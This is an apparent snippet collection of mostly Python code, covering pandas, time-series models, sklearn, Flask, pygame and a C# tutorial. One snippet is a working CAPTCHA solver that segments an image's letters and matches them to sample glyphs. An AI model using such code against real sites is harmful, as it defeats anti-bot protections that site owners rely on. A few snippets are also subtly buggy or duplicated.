Snippets Collections
dddf = pd.DataFrame(
  index=vdf.index,
  columns=['Drawdown', 'Start', 'End'])

dddf['Drawdown'] = ((vdf['Fund Total'].dropna() / np.maximum.accumulate(vdf['Fund Total'].dropna(), axis=0)) - 1)

is_zero = dddf['Drawdown'] == 0

dddf['Start'] = ~is_zero & is_zero.shift(1)
start = list(dddf[dddf['Start']].index)

dddf['End'] = is_zero & (~is_zero).shift(1)
end = list(dddf[dddf['End']].index)

if start[0] > end[0]:
	start.insert(0, dddf.index[0])

if start[-1] > end[-1]:
	end.append(dddf.index[-1])

dd_vdf = pd.DataFrame(
  index=range(0, len(start)),
  columns=('Start', 'End', 'Length', 'Drawdown'))

for i in range(0, len(start)):
  dd = dddf[start[i]:end[i]]['Drawdown'].min()
  dd_vdf.iloc[i] = (start[i].strftime('%Y-%m-%d'), end[i].strftime('%Y-%m-%d'), (end[i] -start[i]).days, dd)
{
  "python.formatting.provider": "black",
  "python.linting.enabled": false,
  "python.linting.pylintEnabled": true,
  "python.formatting.blackPath": "black",
  "python.pythonPath": ".env/bin/python",
  "editor.formatOnSave": true
}

plt.figure(figsize=(16,8))
model_ARIMA = ARIMA(df_log, order=(7,1,7)) #Using p=7, d=1, q=7
results_ARIMA = model_ARIMA.fit()
plt.plot(df_shift)
plt.plot(results_ARIMA.fittedvalues, color='red')
plt.title('ARIMA Model - RMSE: %.4f'% mean_squared_error(results_ARIMA.fittedvalues,df_shift['Close'], squared=False))
plt.show()
#Importing AutoReg function to apply AR model
from statsmodels.tsa.ar_model import AutoReg

plt.figure(figsize=(16,8))
model_AR = AutoReg(df_shift, lags=7) #Using number of lags as 7
results_AR = model_AR.fit()
plt.plot(df_shift)
predict = results_AR.predict(start=0,end=len(df_shift)-1)
predict = predict.fillna(0) #Converting NaN values to 0
plt.plot(predict, color='red')
plt.title('AR Model - RMSE: %.4f'% mean_squared_error(predict,df_shift['Close'], squared=False))  #Calculating rmse
plt.show()
#Importing the seasonal_decompose to decompose the time series
from statsmodels.tsa.seasonal import seasonal_decompose
decomp = seasonal_decompose(df_train)

trend = decomp.trend
seasonal = decomp.seasonal
residual = decomp.resid

plt.figure(figsize=(15,10))
plt.subplot(411)
plt.plot(df_train, label='Actual', marker='.')
plt.legend(loc='upper left')
plt.subplot(412)
plt.plot(trend, label='Trend', marker='.')
plt.legend(loc='upper left')
plt.subplot(413)
plt.plot(seasonal, label='Seasonality', marker='.')
plt.legend(loc='upper left')
plt.subplot(414)
plt.plot(residual, label='Residuals', marker='.')
plt.legend(loc='upper left')
plt.tight_layout()
adfuller(df_shift)
plt.figure(figsize=(16,8))
df_shift = df_log - df_log.shift(periods = 1)
MAvg_shift = df_shift.rolling(window=12).mean()
MStd_shift = df_shift.rolling(window=12).std()
plt.plot(df_shift, color='c')
plt.plot(MAvg_shift, color='red', label = 'Moving Average')
plt.plot(MStd_shift, color='green', label = 'Standard Deviation')
plt.legend()
plt.show()

#Dropping the null values that we get after applying differencing method
df_shift = df_shift.dropna()
from os import walk

f = []
for (dirpath, dirnames, filenames) in walk(mypath):
    f.extend(filenames)
    break
from os import listdir
from os.path import isfile, join
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
%sql SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%';
https://vimsky.com/zh-tw/examples/detail/python-method-regex.sub.html
all_filenames = glob.glob("/home/lynaza/Desktop/Quinn/lda/檢察官起訴書/*.txt")

#return only filename (may contain not only duoi file)
 import os
 arr = os.listdir("/home/lynaza/Desktop/Quinn/lda/檢察官起訴書")
 print(arr)



import cv2
import os
import glob

def load_images_name(path):
    
    list_1 = glob.glob(path+'/*.tif') # depth of 1 folder
    
    list_2 = glob.glob(path+'/*/*.tif') # depth of 2 folder
    
    list_3 = glob.glob(path+'/*/*/*.tif')  # depth of 3 folder
    
    list_4 = glob.glob(path+'/*/*/*/*.tif')  # depth of 4 folder
    
    images_path = list_1 +list_2 +list_3 + list_4

    return images_path

images = load_images_name("/home/lynaza/Desktop/traindata/test")
class Solution:
    def maxTip(self, a, b, n, x, y):
        c,su=[],0
        x1,y1=0,0
        for i in range(n):
            c.append(abs(a[i]-b[i]))
        d=sorted(list(enumerate(c)),key=lambda x:x[1])
        for i in d[::-1]:
            if a[i[0]]>b[i[0]] and x1<x:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]<b[i[0]] and y1<y:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]>b[i[0]] and x1==x:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]<b[i[0]] and y1==y:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]==b[i[0]]:
                su+=a[i[0]]
        return su
            
       

if __name__ == '__main__':
    tc = int(input())
    while tc > 0:
        n, x, y = list(map(int, input().strip().split()))
        a = list(map(int, input().strip().split()))
        b = list(map(int, input().strip().split()))
        ans = Solution().maxTip(a, b, n, x, y)
        print(ans)
        tc -= 1
class Solution:
    def maxTip(self, a, b, n, x, y):
        c,su=[],0
        x1,y1=0,0
        for i in range(n):
            c.append(abs(a[i]-b[i]))
        d=sorted(list(enumerate(c)),key=lambda x:x[1])
        for i in d[::-1]:
            if a[i[0]]>b[i[0]] and x1<x:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]<b[i[0]] and y1<y:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]>b[i[0]] and x1==x:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]<b[i[0]] and y1==y:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]==b[i[0]]:
                su+=a[i[0]]
        return su
            
       

if __name__ == '__main__':
    tc = int(input())
    while tc > 0:
        n, x, y = list(map(int, input().strip().split()))
        a = list(map(int, input().strip().split()))
        b = list(map(int, input().strip().split()))
        ans = Solution().maxTip(a, b, n, x, y)
        print(ans)
        tc -= 1
class Solution:
    def maxTip(self, a, b, n, x, y):
        c,su=[],0
        x1,y1=0,0
        for i in range(n):
            c.append(abs(a[i]-b[i]))
        d=sorted(list(enumerate(c)),key=lambda x:x[1])
        for i in d[::-1]:
            if a[i[0]]>b[i[0]] and x1<x:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]<b[i[0]] and y1<y:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]>b[i[0]] and x1==x:
                su+=b[i[0]]
                y1+=1
            elif a[i[0]]<b[i[0]] and y1==y:
                su+=a[i[0]]
                x1+=1
            elif a[i[0]]==b[i[0]]:
                su+=a[i[0]]
        return su
            
       

if __name__ == '__main__':
    tc = int(input())
    while tc > 0:
        n, x, y = list(map(int, input().strip().split()))
        a = list(map(int, input().strip().split()))
        b = list(map(int, input().strip().split()))
        ans = Solution().maxTip(a, b, n, x, y)
        print(ans)
        tc -= 1
conda create -n p37env python=3.7
conda activate p37env
pip install tf-models-official
import pandas as pd

data = {'Product': ['Desktop Computer','Tablet','Printer','Laptop'],
        'Price': [850,200,150,1300]
        }

df = pd.DataFrame(data, columns= ['Product', 'Price'])

df.to_csv(r'Path where you want to store the exported CSV file\File Name.csv')

print (df)
# best way
data['resume'] = data[['Resume_title', 'City', 'State', 'Description', 'work_experiences', 'Educations', 'Skills', 'Certificates', 'Additional Information']].agg(' '.join, axis=1)


# other way
df["period"] = df["Year"] + df["quarter"]
df['Period'] = df['Year'] + ' ' + df['Quarter']
df["period"] = df["Year"].astype(str) + df["quarter"] #If one (or both) of the columns are not string typed
#Beware of NaNs when doing this!
df['period'] = df[['Year', 'quarter', ...]].agg('-'.join, axis=1) #for multiple string columns
df['period'] = df[['Year', 'quarter']].apply(lambda x: ''.join(x), axis=1)
#method cat() of the .str accessor 
df['Period'] = df.Year.str.cat(df.Quarter)
df['Period'] = df.Year.astype(str).str.cat(df.Quarter.astype(str), sep='q')
df['AllTogether'] = df['Country'].str.cat(df[['State', 'City']], sep=' - ') #add parameter na_rep to replace the NaN values with a string if have nan
columns = ['whatever', 'columns', 'you', 'choose']
df['period'] = df[columns].astype(str).sum(axis=1)

#a function
def str_join(df, sep, *cols):
   ...:     from functools import reduce
   ...:     return reduce(lambda x, y: x.astype(str).str.cat(y.astype(str), sep=sep), 
   ...:                   [df[col] for col in cols])
   ...: 

In [4]: df['cat'] = str_join(df, '-', 'c0', 'c1', 'c2', 'c3')
import re

text = 'this is a text'

try:
    found = re.search('is(.+?)text', text).group(1)
except AttributeError:
    # AAA, ZZZ not found in the original string
    found = '0 wtitle' # apply your error handling
found

=> a

# To get more than 1 search
job_title = []
for i in range(0,9282):
    text = data.work_experiences.iloc[i]
    try:
        title = re.findall(r"wtitle (.*?) wcompany",text)
    except :
        title = 'onejob'
    job_title.append(title)
    
data['job_title'] = job_title
# picking up piece of string between separators
# function using partition, like partition, but drops the separators
def between(left,right,s):
    before,_,a = s.partition(left)
    a,_,after = a.partition(right)
    return before,a,after
 
s = "bla bla blaa <a>data</a> lsdjfasdjöf (important notice) 'Daniweb forum' tcha tcha tchaa"
print between('<a>','</a>',s)
print between('(',')',s)
print between("'","'",s)
 
""" Output:
('bla bla blaa ', 'data', " lsdjfasdj\xc3\xb6f (important notice) 'Daniweb forum' tcha tcha tchaa")
('bla bla blaa <a>data</a> lsdjfasdj\xc3\xb6f ', 'important notice', " 'Daniweb forum' tcha tcha tchaa")
('bla bla blaa <a>data</a> lsdjfasdj\xc3\xb6f (important notice) ', 'Daniweb forum', ' tcha tcha tchaa')
"""
# Make copy to avoid changing original data (when imputing)
X_train_plus = X_train.copy()
X_valid_plus = X_valid.copy()

# Make new columns indicating what will be imputed
for col in cols_with_missing:
    X_train_plus[col + '_was_missing'] = X_train_plus[col].isnull()
    X_valid_plus[col + '_was_missing'] = X_valid_plus[col].isnull()

# Imputation
my_imputer = SimpleImputer()
imputed_X_train_plus = pd.DataFrame(my_imputer.fit_transform(X_train_plus))
imputed_X_valid_plus = pd.DataFrame(my_imputer.transform(X_valid_plus))

# Imputation removed column names; put them back
imputed_X_train_plus.columns = X_train_plus.columns
imputed_X_valid_plus.columns = X_valid_plus.columns

print("MAE from Approach 3 (An Extension to Imputation):")
print(score_dataset(imputed_X_train_plus, imputed_X_valid_plus, y_train, y_valid))
from sklearn.impute import SimpleImputer

# Imputation
my_imputer = SimpleImputer()
imputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))
imputed_X_valid = pd.DataFrame(my_imputer.transform(X_valid))

# Imputation removed column names; put them back
imputed_X_train.columns = X_train.columns
imputed_X_valid.columns = X_valid.columns

print("MAE from Approach 2 (Imputation):")
print(score_dataset(imputed_X_train, imputed_X_valid, y_train, y_valid))
from sklearn.metrics import mean_absolute_error
from sklearn.tree import DecisionTreeRegressor

def get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):
    model = DecisionTreeRegressor(max_leaf_nodes=max_leaf_nodes, random_state=0)
    model.fit(train_X, train_y)
    preds_val = model.predict(val_X)
    mae = mean_absolute_error(val_y, preds_val)
    return(mae)


for max_leaf_nodes in [5, 50, 500, 5000]:
    my_mae = get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y)
    print("Max leaf nodes: %d  \t\t Mean Absolute Error:  %d" %(max_leaf_nodes, my_mae))
import pandas as pd
import matplotlib.pyplot as plt
  
author = ['Jitender', 'Purnima', 'Arpit', 'Jyoti']
article = [210, 211, 114, 178]
  
auth_series = pd.Series(author)
article_series = pd.Series(article)
  
frame = { 'Author': auth_series, 'Article': article_series }
  
result = pd.DataFrame(frame)
  
print(result)
#define the target
y = home_data.SalePrice

#Create the list of features below
feature_names = ['LotArea','YearBuilt','1stFlrSF','2ndFlrSF','FullBath','BedroomAbvGr','TotRmsAbvGrd']

# Select data corresponding to features in feature_names
X = home_data[feature_names]

from sklearn.model_selection import train_test_split

# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
# the random_state argument guarantees we get the same split every time we
# run this script.
train_X, val_X, train_y, val_y = train_test_split(X, y, random_state = 1)

from sklearn.tree import DecisionTreeRegressor
#specify the model
#For model reproducibility, set a numeric value for random_state when specifying the model
iowa_model = DecisionTreeRegressor(random_state=1)

# Fit the model
iowa_model.fit(train_X, train_y)

# get predicted prices on validation data
val_predictions = iowa_model.predict(val_X)

from sklearn.metrics import mean_absolute_error

print(mean_absolute_error(val_y, val_predictions))

df.sum(axis=0, skipna=None)

df.sum(axis=1, skipna=None)
today = str(date.today()) 
now = datetime.now()
print(now)
my_datetime = datetime.strptime(today+ ' 10:30AM', '%Y-%m-%d %I:%M%p')
print(my_datetime)
if (now > my_datetime):
    print("Hello")
df.groupby(['id', 'group', 'term']).size().unstack(fill_value=0)
mydf = mydf.reindex(columns = mydf.columns.tolist() + ['newcol1','newcol2'])
[1 if x<=30 else 0 for x in df_w['Mid-Point']]
import requests

api = 'http://site.api.espn.com/apis/site/v2/sports/baseball/mlb/scoreboard'

jsonData = requests.get(api).json()
events = jsonData['events']

links = []
for event in events:
    event_links = event['links']
    for each in event_links:
        if each['text'] == 'Gamecast':
            links.append(each['href'])
df['color'] = ['red' if x == 'Z' else 'green' for x in df['Set']]

export FLASK_ENV=development                         

export FLASK_ENV=production 

FLASK_APP=hello.py flask run






If you have installed many dependencies in your system and you need requirements.txt for a specific project, you can install first pipreqs:

$ pip install pipreqs

and execute the below command under the project folder.

$ pipreqs

This command will generate requirements.txt file for the particular project.
from flask import Flask
app = Flask(__name__)

@app.route("/")
def hello():
    return "Hello World!"
text = "This is \n some text"
y0, dy = 50, 4
for i, line in enumerate(text.split('\n')):
    y = y0 + i*dy
    cv2.putText(img, line, (50, y ), cv2.FONT_HERSHEY_SIMPLEX, 1, 2)
# check if the event is the X button 
        if event.type==pygame.QUIT:
            # if it is quit the game
            pygame.quit() 
            exit(0) 

if event.type == pygame.KEYUP:
            if event.key==pygame.K_w:
                keys[0]=False
            elif event.key==pygame.K_a:
                keys[1]=False
            elif event.key==pygame.K_s:
                keys[2]=False
            elif event.key==pygame.K_d:
                keys[3]=False
grouped_df = df.groupby("segment")

max_cust = grouped_df.customers.max()
grouped_df = df.groupby("segment")
max_cust = df.groupby("segment").customers.transform(max)
class MLP(torch.nn.Module):
    
    def __init__(self,D_in,H, D_out):
      """
      In the constructor we instantiate two nn.Linear modules and assign them as member variables.
      """
        super(MLPModel,self).__init__()
        self.hidden1 = torch.nn.Linear(D_in,H)
        self.hidden2 = torch.nn.Linear(H,D_out)
        self.sig = torch.nn.Sigmoid()
    
    def forward(self,x):
    	"""
        In the forward function we accept a Tensor of input data and we must return
        a Tensor of output data. We can use Modules defined in the constructor as
        well as arbitrary operators on Tensors.
        """
        out = self.sig(self.hidden1(x))
        out = self.hidden2(out)
        return out
df.drop(['results', 'cum_sum_pred', 'cus_sum_pred'], axis=1)
// python
def isbright(image, dim=10, thresh=0.5):
    # Resize image to 10x10
    image = cv2.resize(image, (dim, dim))
    # Convert color space to LAB format and extract L channel
    L, A, B = cv2.split(cv2.cvtColor(image, cv2.COLOR_BGR2LAB))
    # Normalize L channel by dividing all pixel values with maximum pixel value
    L = L/np.max(L)
    # Return True if mean is greater than thresh else False
    return np.mean(L) > thresh

// c++
bool rockface_image_is_bright(cv::Mat img_mat, int dim, float threshold)
{
	// Resize image to 10x10
	cv::resize(img_mat, img_mat, { dim, dim });

	// Convert color space to LAB format and extract L channel
	cv::cvtColor(img_mat, img_mat, cv::COLOR_RGB2Lab);
	cv::Mat labchannel[3];
	cv::split(img_mat, labchannel);

	cv::imshow("L", labchannel[0]);
	cv::waitKey(0);

	// Normalize L channel by dividing all pixel values with maximum pixel value
	cv::Mat L;
	cv::normalize(labchannel[0], L, 0, 1, cv::NORM_MINMAX);

	// Return True if mean is greater than thresh else False
	float brightness = cv::mean(L).val[0];
	std::cout << "brightness: " << brightness << std::endl;
	return brightness > threshold;
}
DTC = DecisionTreeClassifier()
ADB = AdaBoostClassifier(DTC)

ada_param_grid = { # Params here }

gsABC = GridSearchCV(ADB,param_grid = ada_param_grid , cv=kfold, scoring="accuracy", n_jobs= 4, verbose = 1)

AdaBoost_best =gsABC.best_estimator_

 # Likewise you can do for others and then perform Voting

votingC = VotingClassifier(estimators=[('ada', AdaBoost_best), ('nb', BernoulliNB_best),
    ('dc', DummyClassifier_best)], voting='soft', n_jobs=4)

votingC = votingC.fit(X_train, Y_train)
from sklearn.model_selection import GridSearchCV
parameters = [{'C': [1, 10, 100, 1000], 'kernel': ['linear']},
              {'C': [1, 10, 100, 1000], 'kernel': ['rbf'], 'gamma': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]}]
grid_search = GridSearchCV(estimator = classifier,
                           param_grid = parameters,
                           scoring = 'accuracy',
                           cv = 10,
                           n_jobs = -1)
grid_search = grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
def print_accuracy_and_parameters(grid_search):
    best_accuracy = grid_search.best_score_
    best_parameters = grid_search.best_params_
    best_estimator = grid_search.best_estimator_

    print(best_accuracy)
    print(best_parameters)
    print(best_estimator)

    cv_results = pd.DataFrame(grid_search.cv_results_)

    return(cv_results[['params', 'mean_test_score']].sort_values('mean_test_score', ascending=False).head())
reg_rf = RandomForestRegressor(n_estimators=50)
reg_SVR = SVR(kernel='rbf')
reg_lm = LinearRegression()

models = {'RandomForest':reg_rf,'SVM':reg_SVR, 'LinearRegression':reg_lm}


results = []
for name, model in models.items():
    cv_results = cross_val_score(model, X_test, y_com_test, cv=5)
    print(cv_results.mean())
    print(cv_results.std())

    results.append(cv_results.mean())
cv_accuracies = cross_val_score(classifier, X_train, y_train, cv=10)
print('CV mean acc: ', cv_accuracies.mean())
print('CV mean std: ', cv_accuracies.std())

# can also do cv this way
cv_score = cross_val_score(alg, X_train, y_train, cv=cv_folds)

print ("CV Score : Mean - %.7g | Std - %.7g | Min - %.7g | Max - %.7g" % (np.mean(cv_score),
                                                                          np.std(cv_score),
                                                                          np.min(cv_score),
                                                                          np.max(cv_score)))
>>> 'Coordinates: {latitude}, {longitude}'.format(latitude='37.24N', longitude='-115.81W')
'Coordinates: 37.24N, -115.81W'
>>> coord = {'latitude': '37.24N', 'longitude': '-115.81W'}
>>> 'Coordinates: {latitude}, {longitude}'.format(**coord)
'Coordinates: 37.24N, -115.81W'
import shutil
import operator
import os
from PIL import Image, ImageChops
from operator import itemgetter

def process(file_name):
	im = Image.open(file_name,"r")
	# Get the size of the picture
	width, height = im.size

	#convert to RGB
	pixels = im.load()

	d = {}

	for x in range(width):
		for y in range(height):
			if pixels[x,y] not in d:
				d[pixels[x,y]]=1
			else:
				d[pixels[x,y]]+=1
	print d
	sorted_d = sorted(d.items(), key=operator.itemgetter(0))
	background = sorted_d[0][0]
	captcha = sorted_d[1][0]
	print background, captcha

	for x in range(width):
		for y in range(height):
			if pixels[x,y] != captcha:
				pixels[x,y]=0
			else:
				pixels[x,y]=1
	im.putpalette([0, 0, 0,255,255,255])
	#pattern fix
	for x in range(1,width-1,1):
		for y in range(1,height-1,1):
			if (pixels[x,y] != pixels[x-1,y-1]) and (pixels[x,y] != pixels[x+1,y-1]) and (pixels[x,y] != pixels[x-1,y+1]) and (pixels[x,y] != pixels[x+1,y+1]):
				pixels[x,y]=1

	im.save("tmp.png")

def main(file_name):
	print "[?] Input file:", file_name
	process(file_name)
	captcha_filtered = Image.open('tmp.png')
	captcha_filtered = captcha_filtered.convert("P")
	inletter = False
	foundletter = False
	start = 0
	end = 0

	letters = []

	for y in range(captcha_filtered.size[0]): # slice across
		for x in range(captcha_filtered.size[1]): # slice down
			pix = captcha_filtered.getpixel((y,x))
			if pix != 0:
				inletter = True

		if foundletter == False and inletter == True:
			foundletter = True
			start = y

		if foundletter == True and inletter == False:
			foundletter = False
			end = y
			letters.append((start,end))

		inletter = False

	print "[+] Horizontal positions:", letters

	captcha = ""

	if len(letters) == 4:
		file_names = ["d-0.png", "d-3.png", "d-6.png", "d-9.png", "l-c.png", "l-f.png", "l-i.png", "l-m.png", "l-p.png", "l-s.png", "l-v.png", "l-y.png", "u-b.png", "u-E.png", "u-H.png", "u-k.png", "u-N.png", "u-q.png", "u-t.png", "u-w.png", "u-z.png", "d-1.png", "d-4.png", "d-7.png", "l-a.png", "l-d.png", "l-g.png", "l-j.png", "l-n.png", "l-q.png", "l-t.png", "l-w.png", "l-z.png", "u-c.png", "u-f.png", "u-i.png", "u-l.png", "u-o.png", "u-r.png", "u-u.png", "u-x.png", "d-2.png", "d-5.png", "d-8.png", "l-b.png", "l-e.png", "l-h.png", "l-k.png", "l-o.png", "l-r.png", "l-u.png", "l-x.png", "u-A.png", "u-d.png", "u-G.png", "u-J.png", "u-m.png", "u-p.png", "u-s.png", "u-V.png", "u-y.png"]
		for letter in letters:
			im3 = captcha_filtered.crop(( letter[0], 0, letter[1],captcha_filtered.size[1] ))
			im3 = im3.crop((0, 92, im3.size[0], 220))
			base = im3.convert('L')

			class Fit:
				letter = None
				difference = 0

			best = Fit()

			for letter in file_names:
				#print letter
				current = Fit()
				current.letter = letter

				sample_path = "samples/" + letter
				#print sample_path
				sample = Image.open(sample_path).convert('L').resize(base.size)
				difference = ImageChops.difference(base, sample)

				for x in range(difference.size[0]):
					for y in range(difference.size[1]):
						current.difference += difference.getpixel((x, y))

				if not best.letter or best.difference > current.difference:
					best = current

			#final captcha decoded
			tmp = ''
			tp, letter = best.letter.split('-')
			letter = letter.split('.')[0]
			if tp == 'u':
				tmp = letter.upper()
			else:
				tmp = letter
			print "[+] New leter:", tmp
			captcha = captcha + tmp
		print "[+] Correct captcha:", captcha
	else:
		print "[!] Missing characters in captcha !"

if __name__ == '__main__':
	main("captcha.png")
import wrds
db = wrds.Connection(wrds_username='joe')
db.raw_sql('SELECT date,dji FROM djones.djdaily')
// This variable is not encapsulated.
// Therefore it's missing some context. What is it naming? I dunno.
string name;

// BASIC ENCAPSULATION
// These variables and methods are encapsulated in the Dog class, so
// they make more sense now. They are members of the Dog class.
class Dog {
    string name;
    int age;

    void Bark() {
        Console.WriteLine("Bark!");
    }

    void Rename(string newName) {
        name = newName;
    }
}

// ACCESS MODIFIERS
// The members above have context, but they are accessible by any other
// code. To define access, use access modifiers:
// - public: Member is accessible by any other code in the same assembly
//    or another assembly that references it.
// - private: Member is accessible only by code in the same class or
//    struct.
// - protected: Member is accessible only by code in the same class or
//    any class that is derived from that class.
// - internal: Member is accessible only code within the same assembly.
// - protected internal: Member is accessible only to code within the
//    same assembly or by any class that is derived from that class.
class Dog {
    private string name;
    private int age;

    public void Bark() {
        Console.WriteLine("Bark!");
    }

    public void Rename(string newName) {
        name = newName;
    }

    public string GetName() {
        return name;
    }

    public void SetAge(int newAge) {
        if(newAge > 0)
            age = newAge;
    }

    public int GetAge() {
        return age;
    }
}

// PROPERTIES
// Now the variables are private and only accessible through the public
// methods. This is great cuz we can control how the private variables
// are accessed and modified, but this class seems bulky for only really
// having 2 variables and 1 unique method. Properties allow us to slim
// it down while sitll enforcing rules...
class Dog {
    private string name;
    private int age;

    public string Name { get; set; }

    public int Age {
        get { return age; }
        set {
            if( value > 0)
                age = value;
        }
    }

    public void Bark() {
        Console.WriteLine("Bark!");
    }
}
import random
import pygame

# ========== Pygame Config ================

WIDTH = 400
HEIGHT = 400
screen_size = [WIDTH, HEIGHT]

# Define the colors we will use in RGB format
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)

# Initialize the game engine
pygame.init()

# Set the height and width of the screen
screen = pygame.display.set_mode(screen_size)
pygame.display.set_caption("Ball invaders")


# ========== Functions ===================


def p5_map(n, start1, stop1, start2, stop2):
    return ((n - start1) / (stop1 - start1)) * (stop2 - start2) + start2


# ========== Classes =====================


class Vector:

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __invert__(self):
        return Vector(-self.x, -self.y)


class Position:

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def coordinates(self):
        return self.x, self.y

    def is_clear(self, game_):
        for pos in game_.snake.positions:
            if pos.coordinates == self.coordinates():
                return False
        return True

    def update(self, vector):
        self.x += vector.x
        self.y += vector.y

    def __eq__(self, other):
        return abs(self.x - other.x) < game.object_padding and abs(self.y - other.y) < game.object_padding


VECTOR_SIZE = 5

RIGHT = Vector(VECTOR_SIZE, 0)
LEFT = Vector(-VECTOR_SIZE, 0)
UP = Vector(0, -VECTOR_SIZE)
DOWN = Vector(0, VECTOR_SIZE)


# ========== Game Objects ================


class Shot:

    def __init__(self, game_, init_pos):
        self.game = game_
        self.position = Position(init_pos.x, init_pos.y)
        self.speed = 5

    def update(self):
        pass

    def encounters(self, other):
        return self.position == other.position

    def show(self):
        pygame.draw.circle(self.game.screen, BLUE, self.position.coordinates(), 5)


class FriendlyShot(Shot):

    def __init__(self, game_, init_pos):
        Shot.__init__(self, game_, init_pos)

    def update(self):
        self.position.update(Vector(0, -self.speed))


class EnemyShot(Shot):

    def __init__(self, game_, init_pos):
        Shot.__init__(self, game_, init_pos)

    def update(self):
        self.position.update(Vector(0, self.speed))

    def show(self):
        pygame.draw.circle(self.game.screen, RED, self.position.coordinates(), 5)


class Spaceship:

    def __init__(self, game_):
        self.game = game_
        self.position = Position(WIDTH / 2, HEIGHT - 20)

    def shoot(self):
        self.game.friendly_shots.append(FriendlyShot(self.game, self.position))

    def show(self):
        pygame.draw.circle(self.game.screen, BLACK, self.position.coordinates(), 10)


class Enemy:
    def __init__(self, game_, position_, vibration_rate=1):
        self.game = game_
        self.position = position_
        self.vibration_rate = vibration_rate
        self.vibration_pattern = ['U', 'L', 'D', 'R']
        self.vibration_counter = 0

    def vibrate(self):
        vibration_move = self.vibration_pattern[self.vibration_counter]
        if vibration_move == 'U':
            self.position.y -= self.vibration_rate
        elif vibration_move == 'L':
            self.position.x -= self.vibration_rate
        elif vibration_move == 'D':
            self.position.y += self.vibration_rate
        elif vibration_move == 'R':
            self.position.x += self.vibration_rate
        self.vibration_counter += 1
        if self.vibration_counter == len(self.vibration_pattern):
            self.vibration_counter = 0

    def kill(self):
        self.game.enemies.remove(self)

    def shoot(self):
        self.game.enemy_shots.append(EnemyShot(self.game, self.position))

    def show(self):
        self.vibrate()
        pygame.draw.circle(self.game.screen, GREEN, self.position.coordinates(), 10)


class Game:

    def __init__(self, screen_, object_padding=10):
        self.screen = screen_
        self.ship = Spaceship(self)
        self.object_padding = object_padding
        self.friendly_shots = []
        self.enemy_shots = []
        self.enemies = []
        self.spawn_enemies()

    def spawn_enemies(self):
        positions_ = [Position(x, 20) for x in range(20, WIDTH - 10, 50)]
        for pos in positions_:
            self.enemies.append(Enemy(self, pos))

    def enemies_shoot(self):
        shooting_chance = 0.1
        if random.random() < shooting_chance:
            random.choice(self.enemies).shoot()


if __name__ == '__main__':

    game = Game(screen)

    # Loop until the user clicks the close button.
    done = False
    clock = pygame.time.Clock()

    # Mainloop
    while not done:

        # This limits the while loop to a max of 10 times per second.
        # Leave this out and we will use all CPU we can.
        clock.tick(50)

        pressed_keys = pygame.key.get_pressed()
        if pressed_keys[pygame.K_RIGHT]:
            if not game.ship.position.x + RIGHT.x >= WIDTH:
                game.ship.position.update(RIGHT)
        elif pressed_keys[pygame.K_LEFT]:
            if not game.ship.position.x - LEFT.x <= 0:
                game.ship.position.update(LEFT)

        for event in pygame.event.get():  # User did something
            if event.type == pygame.QUIT:  # If user clicked close
                done = True  # Flag that we are done so we exit this loop
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_SPACE:
                    game.ship.shoot()

        # Clear the screen and set the screen background
        screen.fill(WHITE)

        # ===========> UPDATE POSITIONS HERE <========

        game.enemies_shoot()

        for shot in game.friendly_shots:
            shot.update()
            for enemy in game.enemies:
                if shot.encounters(enemy):
                    enemy.kill()
                    del enemy
                    del shot
                    break

        for shot in game.enemy_shots:
            shot.update()
            if shot.encounters(game.ship):
                exit(1)

        # ===========> START DRAWING HERE <===========

        game.ship.show()

        for shot in game.friendly_shots:
            shot.show()

        for shot in game.enemy_shots:
            shot.show()

        for enemy in game.enemies:
            enemy.show()

        # ===========> END DRAWING HERE <=============

        # Go ahead and update the screen with what we've drawn.
        # This MUST happen after all the other drawing commands.
        pygame.display.flip()
symbols = ['BTCUSDT', 'ETHUSDT']

twm = ThreadedWebsocketManager()
twm.start()

twm.start_multiplex_socket(callback=lambda msg: print('Spot:', msg), streams=[f'{s.lower()}@bookTicker' for s in symbols])
twm.start_futures_multiplex_socket(callback=lambda msg: print('Futures:', msg), streams=[f'{s.lower()}@bookTicker' for s in symbols])
<form action='/event' method='post'>
Year ("yyyy"):  <input type='text' name='year' />
Month ("mm"):  <input type='text' name='month' />
Day ("dd"):  <input type='text' name='day' />
Hour ("hh"):  <input type='text' name='hour' />
Description:  <input type='text' name='info' />
             <input type='submit' name='submit' value='Submit'/>
</form>
>>> a = 1
>>> b = 2
>>> a, b = b, a
>>> a
2
>>> b
1
#importing Autoviz class
from autoviz.AutoViz_Class import AutoViz_Class#Instantiate the AutoViz class
AV = AutoViz_Class()

df = AV.AutoViz('car_design.csv')
from collections import defaultdict, namedtuple, Counter, deque

Counter(words).most_common(6)
challenges_done = [('mike', 10), ('julian', 7), ('bob', 5),
                   ('mike', 11), ('julian', 8), ('bob', 6)]

challenges = defaultdict(list)
for name, challenge in challenges_done:
    challenges[name].append(challenge)

challenges
User = namedtuple('User', 'name role sur')
user = User(name='bob', role='coder', sur='ellepola')
User = namedtuple('User', 'name role sur')
user = User(name='bob', role='coder', sur='ellepola')
def clean(txt):
    txt = txt.str.replace("(<br/>)", "")
    txt = txt.str.replace('(<a).*(>).*(</a>)', '')
    txt = txt.str.replace('(&amp)', '')
    txt = txt.str.replace('(&gt)', '')
    txt = txt.str.replace('(&lt)', '')
